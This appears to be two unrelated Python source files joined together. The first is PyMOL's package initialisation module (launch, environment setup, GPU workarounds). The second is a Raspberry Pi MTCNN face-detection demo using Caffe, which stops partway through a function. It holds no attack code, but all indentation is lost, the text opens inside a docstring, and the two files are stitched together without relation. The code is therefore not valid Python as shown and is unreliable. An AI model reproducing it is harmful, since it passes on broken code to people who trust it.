>>> # with GUI
>>> import pymol
>>> pymol.finish_launching()
>>> # without GUI
>>> import pymol
>>> pymol.finish_launching(['pymol', '-cq'])
'''
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
import __main__
if __name__ == '__main__':
# PyMOL launched as "python pymol/__init__.py"
# or via execfile(".../pymol/__init__.py",...) from main
# or as "python -m pymol.__init__"
if 'pymol' not in sys.modules:
# "python /abc/pymol/__init__.py" will add /abc/pymol to PYTHONPATH
# (we don't want that), but not /abc and not the current directory (we
# want those)
pymol_base = os.path.dirname(os.path.realpath(__file__))
site_packages = os.path.dirname(pymol_base)
# remove /abc/pymol
if pymol_base in sys.path:
sys.path.remove(pymol_base)
# add /abc
if site_packages not in sys.path:
sys.path.insert(0, site_packages)
# add current directory
if '' not in sys.path:
sys.path.insert(0, '')
# arguments default to sys.argv... but also support execfile(...)
# from a terminal where the user could set pymol_argv
args = getattr(__main__, "pymol_argv", None)
# standard launch (consume main thread)
import pymol
pymol.launch(args)
# this should never be reached because PyMOL will exit the process
raise SystemExit
IS_PY2 = sys.version_info[0] == 2
IS_PY3 = sys.version_info[0] == 3
IS_WINDOWS = sys.platform.startswith('win')
IS_MACOS = sys.platform.startswith('darwin')
IS_LINUX = sys.platform.startswith('linux')
if IS_PY3:
import _thread as thread
else:
import thread
import copy
import threading
import re
import time
import traceback
import math
from . import invocation
def _init_internals(_pymol):
# Create a temporary object "stored" in the PyMOL global namespace
# for usage with evaluate based-commands such as alter
_pymol.stored = Scratch_Storage()
# Create a permanent object in the PyMOL global namespace
# that will be picked and unpickled along with the session
_pymol.session = Session_Storage()
# This global will be non-None if logging is active
# (global variable used for efficiency)
_pymol._log_file = None
# This global will be non-None if an external gui
# exists. It mainly exists so that events which occur
# in the Python thread can be handed off to the
# external GUI thread through one or more FIFO Queues
# (global variable used for efficiency)
_pymol._ext_gui = None
# lists of functions to call when saving and restoring pymol session objects
# The entry 'None' represents the PyMOL C-API function call
_pymol._session_save_tasks = [ None ]
_pymol._session_restore_tasks = [ None ]
# cached results (as a list):
# [ [size, (hash1, hash2, ... ), (inp1, inp2, ...), output],
# [size, (hash1, hash2, ... ), (inp1, inp2, ...), output],
# ... ]
_pymol._cache = []
# standard input reading thread
_pymol._stdin_reader_thread = None
# stored views
_pymol._view_dict = {}
_pymol._view_dict_sc = None
# stored scenes
_pymol._scene_dict_sc = None
_pymol._scene_counter = 1
_pymol._scene_quit_on_action = ''
# get us a private invocation pseudo-module
_pymol._invocation = Scratch_Storage()
_pymol._invocation.options = copy.deepcopy(invocation.options)
_pymol._invocation.get_user_config = invocation.get_user_config
_pymol._invocation.parse_args = invocation.parse_args
# these locks are to be shared by all PyMOL instances within a
    # single Python interpreter
_pymol.lock_api = threading.RLock() # mutex for API calls from the outside
_pymol.lock_api_status = threading.RLock() # mutex for PyMOL status info
_pymol.lock_api_glut = threading.RLock() # mutex for GLUT avoidance
_pymol.lock_api_data = threading.RLock() # mutex for internal data structures
def get_version_message(v=None):
'''
Get an informative product + version string
'''
if not v:
v = _cmd.get_version()
p = "PyMOL %s " % v[0]
p += "Incentive Product" if invocation.options.incentive_product else \
"Open-Source"
if v[4]:
p += ' (' + v[4][:10] + ')'
if v[3]:
p += ', ' + time.strftime('%Y-%m-%d', time.localtime(v[3]))
return p
def guess_pymol_path():
'''
Guess PYMOL_PATH from typical locations and return it as string.
'''
init_file = os.path.abspath(__file__)
pymol_path_candidates = [
# $PYMOL_PATH == <site-packages>/pymol/pymol_path
os.path.join(os.path.dirname(init_file), 'pymol_path'),
# $PYMOL_PATH/modules/pymol/__init__.py
re.sub(r"[\/\\]modules[\/\\]pymol[\/\\]__init__\.py[c]*$", "", init_file),
# /usr/share/pymol
os.path.join(sys.prefix, 'share', 'pymol'),
]
for pymol_path in pymol_path_candidates:
if os.path.isdir(pymol_path):
return pymol_path
return '.'
def setup_environ():
# guess PYMOL_PATH if unset
if 'PYMOL_PATH' not in os.environ:
os.environ['PYMOL_PATH'] = guess_pymol_path()
# other PyMOL variables
if 'PYMOL_DATA' not in os.environ:
os.environ['PYMOL_DATA'] = os.path.join(os.environ['PYMOL_PATH'], 'data')
if 'PYMOL_SCRIPTS' not in os.environ:
os.environ['PYMOL_SCRIPTS'] = os.path.join(os.environ['PYMOL_PATH'], 'scripts')
os.environ['TUT'] = os.path.join(os.environ['PYMOL_DATA'], 'tut')
# auto-detect bundled FREEMOL (if present)
if 'FREEMOL' not in os.environ:
for test_path in ['ext', 'freemol']:
test_path = os.path.join(os.environ['PYMOL_PATH'], test_path)
if os.path.isdir(test_path):
os.environ['FREEMOL'] = test_path
break
# include FREEMOL's libpy in sys.path (if present)
if 'FREEMOL' in os.environ:
freemol_libpy = os.path.join(os.environ['FREEMOL'], "libpy")
if os.path.isdir(freemol_libpy) and freemol_libpy not in sys.path:
sys.path.append(freemol_libpy)
# set Tcl/Tk environment if we ship it in ext/lib
pymol_path = os.environ['PYMOL_PATH']
for varname, dirname in [
('TCL_LIBRARY', 'tcl8.5'),
('TK_LIBRARY', 'tk8.5')]:
dirname = os.path.join(pymol_path, "ext", "lib", dirname)
if os.path.isdir(dirname):
os.environ[varname] = dirname
def exec_str(self, string):
'''
Execute string in "self" namespace (used from C)
'''
try:
exec(string, self.__dict__, self.__dict__)
except Exception:
traceback.print_exc()
return None
def exec_deferred(self):
'''
    Execute the stuff from invocation.options.deferred
'''
try:
from socket import error as socket_error
except ImportError:
socket_error = None
print('import socket failed')
cmd = self.cmd
_pymol = cmd._pymol
# read from stdin (-p)
if self.invocation.options.read_stdin and not _pymol._stdin_reader_thread:
try:
t = _pymol._stdin_reader_thread = \
threading.Thread(target=cmd._parser.stdin_reader)
t.setDaemon(1)
t.start()
except:
traceback.print_exc()
# do the deferred stuff
try:
if cmd.ready():
cmd.config_mouse(quiet=1)
for a in self.invocation.options.deferred:
if a[0:4] == "_do_":
cmd.do(a[4:])
else:
cmd.load(a, quiet=0)
except CmdException as e:
print(e)
print(" Error: Argument processing aborted due to exception (above).")
except socket_error:
# this (should) only happen if we're opening a PWG file on startup
# and the port is busy. For now, simply bail...
cmd.wizard("message",["Socket.error: ","",
"\\999Assigned socket in use.","",
"\\779Is PyMOL already launched?","",
"\\966Shutting down..."])
cmd.refresh()
cmd.do("time.sleep(2);cmd.quit()")
def adapt_to_hardware(self):
'''
optimize for (or workaround) specific hardware
'''
cmd = self.cmd
vendor, renderer, version = cmd.get_renderer()
# Quadro cards don't support GL_BACK in stereo contexts
if vendor.startswith('NVIDIA'):
if 'Quadro' in renderer:
if invocation.options.show_splash:
print(" Adapting to Quadro hardware.")
cmd.set('stereo_double_pump_mono', 1)
elif vendor.startswith('Mesa'):
if renderer[0:18]=='Mesa GLX Indirect':
pass
elif vendor.startswith('ATI'):
if renderer[0:17] == 'FireGL2 / FireGL3': # obsolete ?
if invocation.options.show_splash:
print(" Adapting to FireGL hardware.")
cmd.set('line_width', 2, quiet=1)
if IS_WINDOWS:
if sys.getwindowsversion()[0] > 5:
# prevent color corruption by calling glFlush etc.
cmd.set('ati_bugs', 1)
if 'Radeon HD' in renderer:
if invocation.options.show_splash:
print(" Adjusting settings to improve performance for ATI cards.")
if cmd.get_setting_int("use_shaders")==0:
# limit frame rate to 30 fps to avoid ATI "jello"
# where screen updates fall way behind the user.
cmd.set("max_ups", 30)
elif vendor.startswith('Microsoft'):
if renderer[0:17] == 'GDI Generic':
cmd.set('light_count', 1)
cmd.set('spec_direct', 0.7)
elif vendor.startswith("Intel"):
if "Express" in renderer:
if invocation.options.show_splash:
print(" Disabling shaders for Intel Express graphics")
cmd.set("use_shaders", 0)
elif (' R300 ' in vendor # V: X.Org R300 Project, R: Gallium 0.4 on ATI RV370
):
if invocation.options.show_splash:
print(" Detected blacklisted graphics driver. Disabling shaders.")
cmd.set("use_shaders", 0)
# find out how many processors we have, and adjust hash
# table size to reflect available RAM
try:
import multiprocessing
ncpu = multiprocessing.cpu_count()
if ncpu > 1:
cmd.set("max_threads", ncpu)
if invocation.options.show_splash:
print(" Detected %d CPU cores."%ncpu, end=' ')
print(" Enabled multithreaded rendering.")
except:
pass
# store our adapted state as default
cmd.reinitialize("store")
def launch_gui(self):
'''
Launch if requested:
- external GUI
'''
pymol_path = os.getenv('PYMOL_PATH', '')
try:
poll = IS_MACOS
if self.invocation.options.external_gui == 3:
if 'DISPLAY' not in os.environ:
os.environ['DISPLAY'] = ':0.0'
if self.invocation.options.external_gui in (1, 3):
__import__(self.invocation.options.gui)
sys.modules[self.invocation.options.gui].__init__(self, poll,
skin = self.invocation.options.skin)
# import plugin system
import pymol.plugins
except:
traceback.print_exc()
def prime_pymol():
'''
Set the current thread as the glutThread
'''
global glutThread
if not glutThread:
glutThread = thread.get_ident()
def _launch_no_gui():
import pymol2
p = pymol2.SingletonPyMOL()
p.start()
# TODO sufficient?
while (p.idle() or p.getRedisplay() or
invocation.options.keep_thread_alive or
cmd.get_modal_draw() or
cmd.get_setting_int('keep_alive') or
cmd._pymol._stdin_reader_thread is not None):
p.draw()
# TODO needed?
cmd.sync()
p.stop()
def launch(args=None, block_input_hook=0):
'''
Run PyMOL with args
Only returns if we are running pretend GLUT.
'''
if args is None:
args = sys.argv
invocation.parse_args(args)
if invocation.options.gui == 'pmg_qt':
if invocation.options.no_gui:
return _launch_no_gui()
elif invocation.options.testing:
return pymol._cmd.test2()
try:
from pmg_qt import pymol_qt_gui
sys.exit(pymol_qt_gui.execapp())
except ImportError:
print('Qt not available, using GLUT/Tk interface')
invocation.options.gui = 'pmg_tk'
prime_pymol()
_cmd.runpymol(_cmd._get_global_C_object(), block_input_hook)
def finish_launching(args=None):
'''
Start the PyMOL process in a thread
'''
global glutThreadObject
if cmd._COb is not None:
return
import pymol
# legacy
if args is None:
args = getattr(pymol, 'pymol_argv', None)
if args is None:
args = getattr(__main__, 'pymol_argv', sys.argv)
if True:
# run PyMOL in thread
invocation.options.keep_thread_alive = 1
cmd.reaper = threading.current_thread()
glutThreadObject = threading.Thread(target=launch,
args=(list(args), 1))
glutThreadObject.start()
e = threading.Event()
# wait for the C library to initialize
while cmd._COb is None:
e.wait(0.01)
# make sure symmetry module has time to start...
while not hasattr(pymol, 'xray'):
e.wait(0.01)
class CmdException(Exception):
'''
Exception type for PyMOL commands
'''
label = "Error"
def __init__(self, message='', label=None):
self.message = message
if message:
self.args = (message,)
if label:
self.label = label
def __str__(self):
return " %s: %s" % (self.label, self.message)
class IncentiveOnlyException(CmdException):
'''
Exception type for features that are not available in Open-Source PyMOL
'''
label = "Incentive-Only-Error"
def __init__(self, message=''):
if not message:
try:
funcname = sys._getframe(1).f_code.co_name
message = '"%s" is not available in Open-Source PyMOL' % (funcname,)
except:
message = 'Not available in Open-Source PyMOL'
message += '\n\n' \
' Please visit http://pymol.org if you are interested in the\n' \
' full featured "Incentive PyMOL" version.\n'
super(IncentiveOnlyException, self).__init__(message)
class Scratch_Storage:
'''
Generic namespace
'''
def __reduce__(self):
# for loading Python 3 (new-style class) pickle with Python 2
return (self.__class__, (), self.__dict__)
def get_unused_name(self, prefix='tmp'):
'''
Get an unused name from this namespace
'''
i = 1
while True:
name = prefix + str(i)
if not hasattr(self, name):
setattr(self, name, None)
return name
i += 1
class Session_Storage:
'''
Generic namespace
'''
def __reduce__(self):
# for loading Python 3 (new-style class) pickle with Python 2
return (self.__class__, (), self.__dict__)
def _colortype(cmd):
# backwards compatible color index type for iterate, which used
# to expose colors as RGB tuples
get_color_tuple = cmd.get_color_tuple
class Color(int):
def __getitem__(self, i):
return get_color_tuple(self)[i]
def __len__(self):
return 3
return Color
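# Illustrative note (not part of the original source): the class returned by
# _colortype() is an int subclass, so a color index from iterate still behaves
# like an integer while also supporting the legacy RGB item access:
#
#   Color = _colortype(cmd)
#   c = Color(4)                  # color index 4
#   r, g, b = c[0], c[1], c[2]    # looked up via cmd.get_color_tuple(4)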
######### VARIABLES ############################
glutThread = None
######### ENVIRONMENT ##########################
setup_environ()
# initialize instance-specific module/object internals
_init_internals(sys.modules[__name__])
# get X-window support (machine_get_clipboard)
if 'DISPLAY' in os.environ:
from .xwin import *
########## C MODULE ############################
import pymol._cmd
_cmd = sys.modules['pymol._cmd']
from . import cmd
cmd._COb = None
try:
import epymol
except ImportError:
pass
########## WORKAROUND TO PREVENT "import cmd" ##############################
# Previous versions of PyMOL did relative imports and thus allowed
# "import cmd" in pymol scripts to import the pymol.cmd module. To be more
# strict and for compatibility with python3 we use absolute imports now,
# which unfortunately will import an unrelated "cmd" module from the default
# python library, and even worse will corrupt the pymol namespace with it.
# The following finder warns about a bare "import cmd":
class _NoCmdFinder:
def find_spec(self, fullname, path=None, target=None):
if path is None and fullname == 'cmd':
msg = 'use "from pymol import cmd" instead of "import cmd"'
print('Warning: {}'.format(msg))
return None
find_module = find_spec
sys.meta_path.insert(0, _NoCmdFinder())
########## LEGACY PRINT STATEMENT FOR PYMOL COMMAND LINE ###################
if IS_PY3:
def _print_statement(*args, **_):
'''Legacy Python-2-like print statement for the PyMOL command line'''
kw = {}
if args and args[0].startswith('>>'):
kw['file'] = eval(args[0][2:])
args = args[1:]
if args and not args[-1]:
kw['end'] = ' '
args = args[:-1]
args = [eval(a) for a in args]
print(*args, **kw)
cmd.extend('print', _print_statement)
|
demo_gray_single_scale.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import _init_paths
import caffe
import cv2
import numpy as np
from python_wrapper import *
import os
from timeit import default_timer as timer
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
import imutils
from imutils.video import FPS
class PiVideoStream:
def __init__(self,resolution=(352,240),framerate=32):
#initialize the camera and the stream
self.camera = PiCamera()
self.camera.resolution =resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture, format="bgr", use_video_port = True)
        # initialize the frame and the variable used to indicate if the thread should be stopped
self.frame = None
self.stopped = False
def start(self):
#start the thread to read frames from the video stream
Thread(target=self.update,args=()).start()
return self
def update(self):
#keep looping infinitely until the thread is stopped
for f in self.stream:
            # grab the frame from the stream and clear the stream in preparation for the next frame
self.frame = f.array
self.rawCapture.truncate(0)
            # if the thread indicator variable is set, stop the thread and release the camera resources
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
#return the frame most recently read
return self.frame
def stop(self):
#indicate that the thread should be stopped
self.stopped = True
def bbreg(boundingbox, reg):
reg = reg.T
    # calibrate bounding boxes
if reg.shape[1] == 1:
print("reshape of reg")
pass # reshape of reg
w = boundingbox[:,2] - boundingbox[:,0] + 1
h = boundingbox[:,3] - boundingbox[:,1] + 1
bb0 = boundingbox[:,0] + reg[:,0]*w
bb1 = boundingbox[:,1] + reg[:,1]*h
bb2 = boundingbox[:,2] + reg[:,2]*w
bb3 = boundingbox[:,3] + reg[:,3]*h
boundingbox[:,0:4] = np.array([bb0, bb1, bb2, bb3]).T
#print "bb", boundingbox
return boundingbox
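# Illustrative sketch (not part of the original script): bbreg() shifts each
# [x1, y1, x2, y2, score] box by the network's regression offsets, scaled by
# the box width/height. The regression input has one column per box (it is
# transposed internally), matching how it is called from detect_face():
#
#   boxes = np.array([[10.0, 10.0, 50.0, 50.0, 0.9]])
#   reg = np.array([[0.1], [0.0], [-0.1], [0.0]])   # shape (4, numbox)
#   boxes = bbreg(boxes, reg)   # x1 -> 14.1, x2 -> 45.9 for this 41-pixel-wide box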
def pad(boxesA, w, h):
    boxes = boxesA.copy()  # copy so the caller's array is not modified in place
#print '#################'
#print 'boxes', boxes
#print 'w,h', w, h
tmph = boxes[:,3] - boxes[:,1] + 1
tmpw = boxes[:,2] - boxes[:,0] + 1
numbox = boxes.shape[0]
#print 'tmph', tmph
#print 'tmpw', tmpw
dx = np.ones(numbox)
dy = np.ones(numbox)
edx = tmpw
edy = tmph
x = boxes[:,0:1][:,0]
y = boxes[:,1:2][:,0]
ex = boxes[:,2:3][:,0]
ey = boxes[:,3:4][:,0]
tmp = np.where(ex > w)[0]
if tmp.shape[0] != 0:
edx[tmp] = -ex[tmp] + w-1 + tmpw[tmp]
ex[tmp] = w-1
tmp = np.where(ey > h)[0]
if tmp.shape[0] != 0:
edy[tmp] = -ey[tmp] + h-1 + tmph[tmp]
ey[tmp] = h-1
tmp = np.where(x < 1)[0]
if tmp.shape[0] != 0:
dx[tmp] = 2 - x[tmp]
x[tmp] = np.ones_like(x[tmp])
tmp = np.where(y < 1)[0]
if tmp.shape[0] != 0:
dy[tmp] = 2 - y[tmp]
y[tmp] = np.ones_like(y[tmp])
    # Python indexes from 0, while MATLAB indexes from 1
dy = np.maximum(0, dy-1)
dx = np.maximum(0, dx-1)
y = np.maximum(0, y-1)
x = np.maximum(0, x-1)
edy = np.maximum(0, edy-1)
edx = np.maximum(0, edx-1)
ey = np.maximum(0, ey-1)
ex = np.maximum(0, ex-1)
#print "dy" ,dy
#print "dx" ,dx
#print "y " ,y
#print "x " ,x
#print "edy" ,edy
#print "edx" ,edx
#print "ey" ,ey
#print "ex" ,ex
#print 'boxes', boxes
return [dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph]
def rerec(bboxA):
# convert bboxA to square
w = bboxA[:,2] - bboxA[:,0]
h = bboxA[:,3] - bboxA[:,1]
l = np.maximum(w,h).T
#print 'bboxA', bboxA
#print 'w', w
#print 'h', h
#print 'l', l
bboxA[:,0] = bboxA[:,0] + w*0.5 - l*0.5
bboxA[:,1] = bboxA[:,1] + h*0.5 - l*0.5
bboxA[:,2:4] = bboxA[:,0:2] + np.repeat([l], 2, axis = 0).T
return bboxA
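# Illustrative sketch (not part of the original script): rerec() expands each
# box to a square whose edge is the longer of the original width/height,
# keeping the box centred, e.g. a 40 x 20 box becomes 40 x 40:
#
#   b = np.array([[0.0, 0.0, 40.0, 20.0, 0.9]])
#   rerec(b)    # -> [[0., -10., 40., 30., 0.9]]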
def nms(boxes, threshold, type):
"""nms
:boxes: [:,0:5]
:threshold: 0.5 like
:type: 'Min' or others
:returns: TODO
"""
if boxes.shape[0] == 0:
return np.array([])
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
s = boxes[:,4]
area = np.multiply(x2-x1+1, y2-y1+1)
I = np.array(s.argsort()) # read s using I
    pick = []
while len(I) > 0:
xx1 = np.maximum(x1[I[-1]], x1[I[0:-1]])
yy1 = np.maximum(y1[I[-1]], y1[I[0:-1]])
xx2 = np.minimum(x2[I[-1]], x2[I[0:-1]])
yy2 = np.minimum(y2[I[-1]], y2[I[0:-1]])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
if type == 'Min':
o = inter / np.minimum(area[I[-1]], area[I[0:-1]])
else:
o = inter / (area[I[-1]] + area[I[0:-1]] - inter)
pick.append(I[-1])
I = I[np.where( o <= threshold)[0]]
return pick
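# Illustrative sketch (not part of the original script): nms() returns the
# indices of the boxes to keep. 'Min' normalises the overlap by the smaller
# box area; any other value uses the usual intersection-over-union:
#
#   boxes = np.array([[10., 10., 50., 50., 0.9],
#                     [12., 12., 52., 52., 0.8],
#                     [100., 100., 150., 150., 0.7]])
#   keep = nms(boxes, 0.5, 'Union')   # keeps the 0.9 and 0.7 boxes
#   boxes = boxes[keep, :]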
def generateBoundingBox(map, reg, scale, t):
stride = 2
cellsize = 12
map = map.T
dx1 = reg[0,:,:].T
dy1 = reg[1,:,:].T
dx2 = reg[2,:,:].T
dy2 = reg[3,:,:].T
(x, y) = np.where(map >= t)
yy = y
xx = x
'''
if y.shape[0] == 1: # only one point exceed threshold
y = y.T
x = x.T
score = map[x,y].T
dx1 = dx1.T
dy1 = dy1.T
dx2 = dx2.T
dy2 = dy2.T
# a little stange, when there is only one bb created by PNet
#print "1: x,y", x,y
a = (x*map.shape[1]) + (y+1)
x = a/map.shape[0]
y = a%map.shape[0] - 1
#print "2: x,y", x,y
else:
score = map[x,y]
'''
#print "dx1.shape", dx1.shape
#print 'map.shape', map.shape
score = map[x,y]
reg = np.array([dx1[x,y], dy1[x,y], dx2[x,y], dy2[x,y]])
if reg.shape[0] == 0:
pass
boundingbox = np.array([yy, xx]).T
bb1 = np.fix((stride * (boundingbox) + 1) / scale).T # matlab index from 1, so with "boundingbox-1"
bb2 = np.fix((stride * (boundingbox) + cellsize - 1 + 1) / scale).T # while python don't have to
score = np.array([score])
boundingbox_out = np.concatenate((bb1, bb2, score, reg), axis=0)
#print '(x,y)',x,y
#print 'score', score
#print 'reg', reg
return boundingbox_out.T
def drawBoxes(im, boxes):
x1 = boxes[:,0]
y1 = boxes[:,1]
x2 = boxes[:,2]
y2 = boxes[:,3]
for i in range(x1.shape[0]):
cv2.rectangle(im, (int(x1[i]), int(y1[i])), (int(x2[i]), int(y2[i])), (0,255,0), 1)
return im
import time
_tstart_stack = []
def tic():
_tstart_stack.append(time.time())
def toc(fmt="Elapsed: %s s"):
print(fmt % (time.time()-_tstart_stack.pop()))
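# Illustrative sketch (not part of the original script): tic()/toc() form a
# MATLAB-style timer stack, so nested timings pop in LIFO order:
#
#   tic()
#   some_slow_call()              # hypothetical placeholder for any slow step
#   toc("slow call took %s s")    # prints the elapsed seconds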
def detect_face(img, minsize, PNet, RNet, ONet, threshold, fastresize, factor):
img2 = img.copy()
factor_count = 0
total_boxes = np.zeros((0,9), np.float)
points = []
h = img.shape[0]
w = img.shape[1]
minl = min(h, w)
img = img.astype(float)
m = 12.0/minsize
minl = minl*m
#total_boxes = np.load('total_boxes.npy')
#total_boxes = np.load('total_boxes_242.npy')
#total_boxes = np.load('total_boxes_101.npy')
# create scale pyramid
scales = []
while minl >= 12:
scales.append(m * pow(factor, factor_count))
minl *= factor
factor_count += 1
# first stage
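    # NOTE: the scale pyramid computed above is discarded; the fixed list of
    # scales below overrides it (presumably tuned for the small Pi camera
    # frames used by this demo).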
scales = [0.128, 0.08, 0.148, 0.1]
tic()
for scale in scales:
hs = int(np.ceil(h*scale))
ws = int(np.ceil(w*scale))
if fastresize:
im_data = (img-127.5)*0.0078125 # [0,255] -> [-1,1]
im_data = cv2.resize(im_data, (ws,hs)) # default is bilinear
else:
im_data = cv2.resize(img, (ws,hs)) # default is bilinear
im_data = (im_data-127.5)*0.0078125 # [0,255] -> [-1,1]
#im_data = imResample(img, hs, ws); print "scale:", scale
im_data = np.swapaxes(im_data, 0, 2)
im_data = np.array([im_data], dtype = np.float)
PNet.blobs['data'].reshape(1, 3, ws, hs)
PNet.blobs['data'].data[...] = im_data
out = PNet.forward()
boxes = generateBoundingBox(out['prob1'][0,1,:,:], out['conv4-2'][0], scale, threshold[0])
if boxes.shape[0] != 0:
#print boxes[4:9]
#print 'im_data', im_data[0:5, 0:5, 0], '\n'
#print 'prob1', out['prob1'][0,0,0:3,0:3]
pick = nms(boxes, 0.5, 'Union')
if len(pick) > 0 :
boxes = boxes[pick, :]
if boxes.shape[0] != 0:
total_boxes = np.concatenate((total_boxes, boxes), axis=0)
#np.save('total_boxes_101.npy', total_boxes)
#####
# 1 #
#####
print("Pnet boxes:",total_boxes.shape[0])
print("Pnet time:")
toc()
#print total_boxes
#return total_boxes, []
tic()
numbox = total_boxes.shape[0]
if numbox > 0:
# nms
pick = nms(total_boxes, 0.7, 'Union')
total_boxes = total_boxes[pick, :]
#print("[2]:",total_boxes.shape[0])
# revise and convert to square
regh = total_boxes[:,3] - total_boxes[:,1]
regw = total_boxes[:,2] - total_boxes[:,0]
t1 = total_boxes[:,0] + total_boxes[:,5]*regw
t2 = total_boxes[:,1] + total_boxes[:,6]*regh
t3 = total_boxes[:,2] + total_boxes[:,7]*regw
t4 = total_boxes[:,3] + total_boxes[:,8]*regh
t5 = total_boxes[:,4]
total_boxes = np.array([t1,t2,t3,t4,t5]).T
#print "[3]:",total_boxes.shape[0]
#print regh
#print regw
#print 't1',t1
#print total_boxes
total_boxes = rerec(total_boxes) # convert box to square
#print("[4]:",total_boxes.shape[0])
total_boxes[:,0:4] = np.fix(total_boxes[:,0:4])
#print("[4.5]:",total_boxes.shape[0])
#print total_boxes
[dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = pad(total_boxes, w, h)
#print total_boxes.shape
#print total_boxes
numbox = total_boxes.shape[0]
if numbox > 0:
# second stage
#print 'tmph', tmph
#print 'tmpw', tmpw
#print "y,ey,x,ex", y, ey, x, ex,
#print "edy", edy
#tempimg = np.load('tempimg.npy')
# construct input for RNet
tempimg = np.zeros((numbox, 24, 24, 3)) # (24, 24, 3, numbox)
for k in range(numbox):
tmp = np.zeros((int(tmph[k]), int(tmpw[k]),3))
#print "dx[k], edx[k]:", dx[k], edx[k]
#print "dy[k], edy[k]:", dy[k], edy[k]
#print "img.shape", img[y[k]:ey[k]+1, x[k]:ex[k]+1].shape
#print "tmp.shape", tmp[dy[k]:edy[k]+1, dx[k]:edx[k]+1].shape
tmp[int(dy[k]):int(edy[k]+1), int(dx[k]):int(edx[k]+1)] = img[int(y[k]):int(ey[k]+1), int(x[k]):int(ex[k]+1)]
#print "y,ey,x,ex", y[k], ey[k], x[k], ex[k]
#print "tmp", tmp.shape
tempimg[k,:,:,:] = cv2.resize(tmp, (24, 24))
#tempimg[k,:,:,:] = imResample(tmp, 24, 24)
#print 'tempimg', tempimg[k,:,:,:].shape
#print tempimg[k,0:5,0:5,0]
#print tempimg[k,0:5,0:5,1]
#print tempimg[k,0:5,0:5,2]
#print k
#print tempimg.shape
#print tempimg[0,0,0,:]
tempimg = (tempimg-127.5)*0.0078125 # done in imResample function wrapped by python
#np.save('tempimg.npy', tempimg)
# RNet
tempimg = np.swapaxes(tempimg, 1, 3)
#print tempimg[0,:,0,0]
RNet.blobs['data'].reshape(numbox, 3, 24, 24)
RNet.blobs['data'].data[...] = tempimg
out = RNet.forward()
#print out['conv5-2'].shape
#print out['prob1'].shape
score = out['prob1'][:,1]
#print 'score', score
pass_t = np.where(score>threshold[1])[0]
#print 'pass_t', pass_t
score = np.array([score[pass_t]]).T
total_boxes = np.concatenate( (total_boxes[pass_t, 0:4], score), axis = 1)
#print("[5]:",total_boxes.shape[0])
#print total_boxes
#print "1.5:",total_boxes.shape
mv = out['conv5-2'][pass_t, :].T
#print "mv", mv
if total_boxes.shape[0] > 0:
pick = nms(total_boxes, 0.7, 'Union')
#print 'pick', pick
if len(pick) > 0 :
total_boxes = total_boxes[pick, :]
#print("[6]:",total_boxes.shape[0])
total_boxes = bbreg(total_boxes, mv[:, pick])
#print("[7]:",total_boxes.shape[0])
total_boxes = rerec(total_boxes)
#print("[8]:",total_boxes.shape[0])
print("Rnet time:")
toc()
#####
# 2 #
#####
#print("2:",total_boxes.shape)
tic()
numbox = total_boxes.shape[0]
if numbox > 0:
# third stage
total_boxes = np.fix(total_boxes)
[dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = pad(total_boxes, w, h)
#print 'tmpw', tmpw
#print 'tmph', tmph
#print 'y ', y
#print 'ey', ey
#print 'x ', x
#print 'ex', ex
tempimg = np.zeros((numbox, 48, 48, 3))
for k in range(numbox):
tmp = np.zeros((int(tmph[k]), int(tmpw[k]),3))
tmp[int(dy[k]):int(edy[k]+1), int(dx[k]):int(edx[k]+1)] = img[int(y[k]):int(ey[k]+1), int(x[k]):int(ex[k]+1)]
tempimg[k,:,:,:] = cv2.resize(tmp, (48, 48))
tempimg = (tempimg-127.5)*0.0078125 # [0,255] -> [-1,1]
# ONet
tempimg = np.swapaxes(tempimg, 1, 3)
ONet.blobs['data'].reshape(numbox, 3, 48, 48)
ONet.blobs['data'].data[...] = tempimg
out = ONet.forward()
score = out['prob1'][:,1]
points = out['conv6-3']
pass_t = np.where(score>threshold[2])[0]
points = points[pass_t, :]
score = np.array([score[pass_t]]).T
total_boxes = np.concatenate( (total_boxes[pass_t, 0:4], score), axis=1)
#print("[9]:",total_boxes.shape[0])
mv = out['conv6-2'][pass_t, :].T
w = total_boxes[:,3] - total_boxes[:,1] + 1
h = total_boxes[:,2] - total_boxes[:,0] + 1
points[:, 0:5] = np.tile(w, (5,1)).T * points[:, 0:5] + np.tile(total_boxes[:,0], (5,1)).T - 1
points[:, 5:10] = np.tile(h, (5,1)).T * points[:, 5:10] + np.tile(total_boxes[:,1], (5,1)).T -1
if total_boxes.shape[0] > 0:
total_boxes = bbreg(total_boxes, mv[:,:])
#print("[10]:",total_boxes.shape[0])
pick = nms(total_boxes, 0.7, 'Min')
#print pick
if len(pick) > 0 :
total_boxes = total_boxes[pick, :]
#print("[11]:",total_boxes.shape[0])
points = points[pick, :]
#####
# 3 #
#####
#print("3:",total_boxes.shape)
print("Onet time:")
toc()
return total_boxes, points
def initFaceDetector():
minsize = 20
caffe_model_path = "/home/duino/iactive/mtcnn/model"
threshold = [0.6, 0.7, 0.7]
factor = 0.709
caffe.set_mode_cpu()
PNet = caffe.Net(caffe_model_path+"/det1.prototxt", caffe_model_path+"/det1.caffemodel", caffe.TEST)
RNet = caffe.Net(caffe_model_path+"/det2.prototxt", caffe_model_path+"/det2.caffemodel", caffe.TEST)
ONet = caffe.Net(caffe_model_path+"/det3.prototxt", caffe_model_path+"/det3.caffemodel", caffe.TEST)
return (minsize, PNet, RNet, ONet, threshold, factor)
def haveFace(img, facedetector):
minsize = facedetector[0]
PNet = facedetector[1]
RNet = facedetector[2]
ONet = facedetector[3]
threshold = facedetector[4]
factor = facedetector[5]
if max(img.shape[0], img.shape[1]) < minsize:
return False, []
img_matlab = img.copy()
tmp = img_matlab[:,:,2].copy()
img_matlab[:,:,2] = img_matlab[:,:,0]
img_matlab[:,:,0] = tmp
#tic()
boundingboxes, points = detect_face(img_matlab, minsize, PNet, RNet, ONet, threshold, False, factor)
#toc()
containFace = (True, False)[boundingboxes.shape[0]==0]
